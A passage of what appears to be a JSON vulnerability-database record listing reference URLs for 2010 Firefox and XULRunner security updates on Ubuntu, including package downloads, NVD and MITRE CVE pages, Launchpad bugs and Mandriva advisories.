"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1215"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-2-libthai_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-3.5-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-3.5-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/abrowser_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-2-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-6218"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://store.mandriva.com/product_info.php?cpath=149\u0026products_id=490"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5913"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1125"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/599796"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1201"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/559149"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1121"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1198"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1200"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1197"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-venkman_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1196"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_i386.deb"
},
{
"trust": 0.1,
